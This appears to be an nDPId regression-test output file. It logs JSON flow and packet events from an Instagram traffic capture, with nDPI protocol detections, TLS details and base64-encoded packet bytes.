00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"instagram.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"instagram.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1436720898354} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720898354,"flow_last_seen":1436720898354,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720898354,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1436720898354,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720898354,"pkt":"ABsv8H60QPMIw47hCABFAAA8TypAAEAGEYLAqABnrfxrBNw+AbsehKWiAAAAAKACOQjaPgAAAgQFtAQCCAoAA+qIAAAAAAEDAwY="} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720898386,"flow_last_seen":1436720898386,"flow_idle_time":7440000,"flow_min_l4_payload_len":1365,"flow_max_l4_payload_len":1365,"flow_tot_l4_payload_len":1365,"flow_avg_l4_payload_len":1365,"midstream":1,"thread_ts_msec":1436720898386,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -02316{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1436720898386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1431,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1431,"pkt_l4_len":1397,"thread_ts_msec":1436720898386,"pkt":"ABsv8H60QPMIw47hCABFAAWJa5BAAEAGjI7AqABnHw1dNISQAbuIwY4ypNSTmIAYARMTGgAAAQEICgAD6otaUmp7FwMBBVB9SXVyqGN\/Z0IQOrRWeDqy2ESAojaAx4QQZK8Nvn9P2WG4BrAo87sybB9iQ6L07zu3SJx\/yEENym+6oXOIueLurovz4xM5H+e2VkXRxNwq2D0zbcPaARfl1kqZ5lxozT2KxP5upnv5ZlZknUeHJ9iJUeI933878+9Wa2p3jAkSn4v+PhMZ8tdKr\/DbC4Dao9UoiB0NXUAr3Yz5mLZxqwvhp7T5JBYmrpug0k+c+c5jewd+5zMMLlTOh9zrkFpN\/SPdxljY89SWMG4iWok6qAWd81044WQFB8MMk6d1YEgnl4MTRR4s5nra0RAZ\/18nINKDy\/+7OtbIdykHRTDGdkzNglojGhlbMwXwCoSaU7eaC\/UG3QHuANJheRiTxBbb9LObDO61gFXBkdpo\/nFCQJ5DEAR9LRi5VbgUevhOk8v2CnW3NfU8tU\/NhXT2Fwav0PyuAxlku4R0TFjGrX0lMbSi5TfJsyWyqS9JUaHL9+9Lo2MolHMixycuQJ8OBJfxMjbh4vndGe6E5xjywRDhon5Ivpm51kbX7pr85erPPQ5esyd11\/S2GN1nyosTrQfKPFTMJ2PKe2m7QTQt+uAz\/lbUTHbMP5WXngggI0bC1v64BOTbVZvk5uSBRBJTxfNNwpu5Mu42yT2kpORmWxKLjzXxHI3WY0zq00CLVkZ1W4ZdSNXs14xkPKnh8GETvWNyrC0OkJAC\/senhsF4RXOoqIV\/fvDhI7Lz\/aB3VqgZGkZTiT2tG0nkNbTl36TNhCL0NMIpdEkg3CtkeHnRpYXxlFUaqjl0oiNlqmXrT3txeOlkpgLeE8sil6hQeUXLUDxeB\/KJ3hVWQV57tvquoi3TQ0mdlDPh3nKxwFekfGvexzie5JWVEiecROjBicDHlMGZSqgfGOOL9obBhKFQKyGkKwqvDD0GLpn+uVlqpq4HgYehGmZsXkGfKjhOvgYnCN46aHecrF2yix3uKy9HcGVhEh0jdkP6ZVKeYPjfh1VormnzwC798pJrA6FXeukKkQhENaxtIfjtfZqrhxgkGn44Wi6ohn6pe\/FHHmbNcPgV6V8fsqp75GNTcdW4payqjcXiRcbHyE8T1\/Qx4baiJDp6KLsZS4gAneRh+ALhxukKM03jbRUClXAh8oRiLl0u+SOlflfwh8goOCkzbht0yzBBd5s+YE\/rKLvLODamT6vRSajD988ioyLCTi6O7PjCpIz0x86CPfl59RFLMWfW1DDNxLLiQpG5QmdGA\/0xKZPtgucNxJfMg8zisuAsBotSOZNTt7iyYW\/IMjbjZfUDk2XnW0FMevjvN1dNSzxncEScDgEwhOZR\/bPFjnmrDfWVV5x9BRHI5MP8wUwSlhypizc+qxTGIgicImjYGkhAIz+xcFmXadM0YNZEvMZaj9aBOHMX1Oble6EYxmSHOrpQKqfzbWeMlvwrQYuci0kLy\/\/bshVduwlDBy5JYqDunQnZyDGNhNVfyaH+ng8KQ6sBqINnITFXfAnCkwXV\/HK1iUkb7QzoqBn3gpftCp83hNH0foudA8Gdf6kurlWwgMEOXi5BfTqlD4DwASXt9A68u1P9Zz8s0alrX2UlusB6fvL9Q9Js6MLwiQyj+bjdEcQ3Uplwrw6qLdouhHzsdgkMnVdwc2l5wv8KPOcXqmQvqjndZFz1nXaAVhwsFoo1zwY3LiNiYjhwWSYaeCHLdPVBHtAjW1OZFou+zyYe9X36AFhBBqrW+04QrWGvIhn1jD27wWhOa1bAC4ScjrpH0lKPe5njeedOXaKkZFE++EHilCzyFRBq6mDF3sb10u4yUIsQcfD4LLSh"} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1436720898475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720898475,"pkt":"QPMIw47hABsv8H60CABFAAA05iNAAFUGAlAfDV00wKgAZwG7hJCk1JOYiMGTh4AQAE5t9QAAAQEIClpSq0YAA+qL"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1436720898499,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720898499,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAAFIGTqyt\/GsEwKgAZwG73D5XFMWUHoSlo6ASOJBK1AAAAgQFlgQCCAq8TYT0AAPqiAEDAwg="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1436720898499,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720898499,"pkt":"ABsv8H60QPMIw47hCABFAAA0TytAAEAGEYnAqABnrfxrBNw+AbsehKWjVxTFlYAQAOXaNgAAAQEICgAD6pe8TYT0"} -00981{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720898354,"flow_last_seen":1436720898501,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1436720898501,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"telegraph-ash.instagram.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01299{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1436720898551,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":679,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":679,"pkt_l4_len":645,"thread_ts_msec":1436720898551,"pkt":"QPMIw47hABsv8H60CABFAAKZ5iRAAFUG\/+kfDV00wKgAZwG7hJCk1JOYiMGTh4AYAE6DfwAAAQEIClpSq5UAA+qLFwMBAmB3TNLiDxMdaG\/77FJR8O6B7ETM5PL1YEwRicjM0iP0UHaAjwUM69tZJRboKPSJSylQ1372woiRMUoGT0dkqivXwS77nykGpDpQxH2zG\/qLmXj10Apbm9mNJzojbuGkVAQeXciVaLovJfxV8pe4ApuOMtqX+wzNa0ZzIxrRfdGy1r+REoc96\/duttzeccU7r8F+0sSj4kAMBptpjPxHIWmQ8bvcQmsOZTBbtWqbInBydwnOzZKHuUG4UpWsNoKQLrxSa1ETAsjugoyEe5PPT8+cb8Irh4mKsNfbStX5KDjpe9Dme8aKUCL1ceYHHjALeMY9l4fx2o0KIF6TukGkzvqR8cZ+qcyDG5U\/HYh5lxYTcHS7lDXS1PzV6XOR41h1cZ9L+KxXE6JczRHCSiNT1VF7boI4Qizj5lEdfdajhSQHOEg16UAhsZHpgK1G5Iki1ek6rdWyUqwchJMZYUThaRdJpKv9RM0OW9cAtKW4cZKenq0TEdOPDEBRCwskRboA6Gi3YnhJ3qdvDGkTLGo9t+FpkGczAZZn4gKC4xoEybQb10OFqFb4BP0BHlc1dmzqbYjWeEKW2wJjaNEaqdUvlusDaKzJPAfd\/FC3qcdqBy6RoP1rw6AWfXgFirXb5SF1IsZGaICO7Vi\/A05NBIj2TN+sAkrMTvlnJxzijI3OS4z\/O7pdS0yJ1AhdM2CbNqiTSP1\/fSWG2i895LYIERx7TAiABxyhh9ufac6WLn1D9wJV86snpuHfJEPWipx7pSJs20IjfVBIUe\/onrcoOjL6GotP95FotxVNOdpbLqczmpv1mQ=="} -01033{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1436720898354,"flow_last_seen":1436720898646,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":609,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1436720898646,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"telegraph-ash.instagram.com","ja3":"54ae5fcb0159e2ddf6a50e149221c7c7","ja3s":"acb741bcdffb787c5a52654c78645bdf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} -00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":49,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720898386,"flow_last_seen":1436720900498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":19727,"flow_avg_l4_payload_len":616,"midstream":1,"thread_ts_msec":1436720900498,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720898386,"flow_last_seen":1436720900498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":19727,"flow_avg_l4_payload_len":616,"midstream":1,"thread_ts_msec":1436720900498,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900684,"flow_last_seen":1436720900684,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720900684,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00819{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1436720900684,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":326,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":326,"pkt_l4_len":292,"thread_ts_msec":1436720900684,"pkt":"ABsv8H60QPMIw47hCABFAAE4wXBAAEAGQn\/AqABnLiFGoJegAFCP9SVkp0jV34AYH+olJAAAAQEICgAD63Ga3vWjR0VUIC9ocGhvdG9zLWFrLXhhcDEvdDUxLjI4ODUtMTUvZTM1LzEwODU5OTk0XzEwMDk0MzM3OTI0MzQ0NDdfMTYyNzY0NjA2Ml9uLmpwZz9zZT03IEhUVFAvMS4xDQpIb3N0OiBwaG90b3MtaC5hay5pbnN0YWdyYW0uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBJbnN0YWdyYW0gNy4xLjEgQW5kcm9pZCAoMTkvNC40LjI7IDQ4MGRwaTsgMTA4MHgxOTIwOyBzYW1zdW5nOyBHVC1JOTUwNTsgamZsdGU7IHFjb207IGl0X0lUKQ0KDQo="} -00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900684,"flow_last_seen":1436720900684,"flow_idle_time":7440000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1436720900684,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-h.ak.instagram.com","url":"photos-h.ak.instagram.com\/hphotos-ak-xap1\/t51.2885-15\/e35\/10859994_1009433792434447_1627646062_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900687,"flow_last_seen":1436720900687,"flow_idle_time":7440000,"flow_min_l4_payload_len":253,"flow_max_l4_payload_len":253,"flow_tot_l4_payload_len":253,"flow_avg_l4_payload_len":253,"midstream":1,"thread_ts_msec":1436720900687,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00810{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1436720900687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":319,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":319,"pkt_l4_len":285,"thread_ts_msec":1436720900687,"pkt":"ABsv8H60QPMIw47hCABFAAEx0CVAAEAGO5vAqABnUlUaouJQAFA6kgvvKZIczIAYH0cqkQAAAQEICgAD63FWCuc2R0VUIC9ocGhvdG9zLWFrLXhhZjEvdDUxLjI4ODUtMTUvZTE1LzExMzg2NTI0XzExMDI1NzYxOTMxNzQzMF8zNzk1MTM2NTRfbi5qcGcgSFRUUC8xLjENCkhvc3Q6IHBob3Rvcy1nLmFrLmluc3RhZ3JhbS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEluc3RhZ3JhbSA3LjEuMSBBbmRyb2lkICgxOS80LjQuMjsgNDgwZHBpOyAxMDgweDE5MjA7IHNhbXN1bmc7IEdULUk5NTA1OyBqZmx0ZTsgcWNvbTsgaXRfSVQpDQoNCg=="} -00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900687,"flow_last_seen":1436720900687,"flow_idle_time":7440000,"flow_min_l4_payload_len":253,"flow_max_l4_payload_len":253,"flow_tot_l4_payload_len":253,"flow_avg_l4_payload_len":253,"midstream":1,"thread_ts_msec":1436720900687,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-g.ak.instagram.com","url":"photos-g.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e15\/11386524_110257619317430_379513654_n.jpg","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900690,"flow_last_seen":1436720900690,"flow_idle_time":7440000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900690,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1436720900690,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":325,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":325,"pkt_l4_len":291,"thread_ts_msec":1436720900690,"pkt":"ABsv8H60QPMIw47hCABFAAE3v7dAAEAGS+vAqABnUlUauq1bAFCj1oFKfMvpWoAYDTz8dgAAAQEICgAD63JUYaBjR0VUIC9ocGhvdG9zLWFrLXhhZjEvdDUxLjI4ODUtMTUvZTM1LzExMzc5MTQ4XzE0NDkxMjAyMjg3NDUzMTZfNjA3NDc3OTYyX24uanBnP3NlPTcgSFRUUC8xLjENCkhvc3Q6IHBob3Rvcy1lLmFrLmluc3RhZ3JhbS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEluc3RhZ3JhbSA3LjEuMSBBbmRyb2lkICgxOS80LjQuMjsgNDgwZHBpOyAxMDgweDE5MjA7IHNhbXN1bmc7IEdULUk5NTA1OyBqZmx0ZTsgcWNvbTsgaXRfSVQpDQoNCg=="} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900690,"flow_last_seen":1436720900690,"flow_idle_time":7440000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900690,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900692,"flow_last_seen":1436720900692,"flow_idle_time":7440000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900692,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1436720900692,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":325,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":325,"pkt_l4_len":291,"thread_ts_msec":1436720900692,"pkt":"ABsv8H60QPMIw47hCABFAAE3iBFAAEAGg5LAqABnUlUaueJtAFAE8EMOWjfyZYAYD+bdMQAAAQEICgAD63JZ6ogYR0VUIC9ocGhvdG9zLWFrLXhmYTEvdDUxLjI4ODUtMTUvZTM1LzExNDI0NjIzXzE2MDgxNjMxMDk0NTA0MjFfNjYzMzE1ODgzX24uanBnP3NlPTcgSFRUUC8xLjENCkhvc3Q6IHBob3Rvcy1mLmFrLmluc3RhZ3JhbS5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEluc3RhZ3JhbSA3LjEuMSBBbmRyb2lkICgxOS80LjQuMjsgNDgwZHBpOyAxMDgweDE5MjA7IHNhbXN1bmc7IEdULUk5NTA1OyBqZmx0ZTsgcWNvbTsgaXRfSVQpDQoNCg=="} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720900692,"flow_last_seen":1436720900692,"flow_idle_time":7440000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":259,"midstream":1,"thread_ts_msec":1436720900692,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-f.ak.instagram.com","url":"photos-f.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11424623_1608163109450421_663315883_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} -02377{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1436720900716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900716,"pkt":"QPMIw47hABsv8H60CABFAAW+uH1AADkGTewuIUagwKgAZwBQl6CnSNXfj\/UmaIAQAiku5gAAAQEICprfPdsAA+txSFRUUC8xLjEgMjAwIE9LDQpMYXN0LU1vZGlmaWVkOiBTYXQsIDExIEp1bCAyMDE1IDE2OjU3OjA4IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnDQpDb250ZW50LUxlbmd0aDogMTUwMDMxDQpDYWNoZS1Db250cm9sOiBuby10cmFuc2Zvcm0sIG1heC1hZ2U9MTIwOTYwMA0KRXhwaXJlczogU3VuLCAyNiBKdWwgMjAxNSAxNzowODoyMCBHTVQNCkRhdGU6IFN1biwgMTIgSnVsIDIwMTUgMTc6MDg6MjAgR01UDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/+0AfFBob3Rvc2hvcCAzLjAAOEJJTQQEAAAAAABfHAIoAFpGQk1EMjMwMDA5NjkwMTAwMDBjMzQ3MDAwMDEzNjQwMDAwNjM4NDAwMDA4MzJiMDEwMDBiODUwMTAwODdkZjAxMDAwZDRhMDIwMDlkYTIwMjAwNzY3MzAzMDAA\/9sAQwAGBgYGBgYLBgYLEAsLCxAVEBAQEBUbFRUVFRUbIBsbGxsbGyAgICAgICAgJycnJycnLS0tLS0zMzMzMzMzMzMz\/9sAQwEICAgNDA0WDAwWNSQeJDU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1\/8IAEQgEDwQPAwEiAAIRAQMRAf\/EABwAAAEFAQEBAAAAAAAAAAAAAAUBAgMEBgAHCP\/EABoBAAMBAQEBAAAAAAAAAAAAAAABAgMEBQb\/2gAMAwEAAhADEAAAANnYrv6OWePnpwvl4Ucr5ZqutmsxzGNFZbBKECWI2oX8gp+rqOdscgJarTJrPTiAtUZEnHz0qOljcEskD1c01Rksi2ko7C10FaSJqLDY0bkkglRK+J01IqIm99eIL6jmheWgjCKVJUTsjcmxJXNVG3K1KNr3irtvMCithKVbraoq9cQKb5mse+vydpRzhEXinDIvFyoIspSDsdW4LfVORbSFGS9z0Q07Vapihe24SRFCV8D5p7U4fInJNSacY9CnDoLekTpOusTppdQVRUWk5Z3S6nSOaiisOZWrWqtSjFjqVjcxzA+ktxbdV5FmYfOO1PR5O6tOVN6dGCvruavqOenPG2AT0hWptvhfNzvglTijkaS2WB9FlYElvdXcE7qNkc6sYnO6nwWWwvB6cwHJ3BI+Pk7LqzU7SQPCRiRBzWw1M8o9Wr7h8yd2Yes0RUdMne6nInZbXUcjq0gpefEOw6FZdhsSpo1\/NNSRGRwz8KussbUKdHc9LXYK7JQkHbZE9CMRrLHVuCy6tIhIp+ajbOxDZOaN8kM6b52TRosiOmpWqktXN4fR9WcyxQQ3Mi1m1NxKzxO57gjldCOau1Guh6KocxG0s90jNuePlRqSaiqL7xrhlZBD1ROCogrq0VC86jwXI66CmfUcy84e5MlIKemSZRcnZWo5lqOCIVpafMuyjnIKtHOmrjanNWmV0at9VUdlavIty0UHfcNVBHhvASbQRlyCBWndG1xZlpvVXVpuTtPpPHelHPmiqjZJuxJVci8tKRVa6m0Lsg1QJNocO+lKMV1BqVN+Km1zbjrI1P1ZzUr6iNEZRL5ZRw56q6yDgmfWQLsg16ZNg3hkHi+ETQdI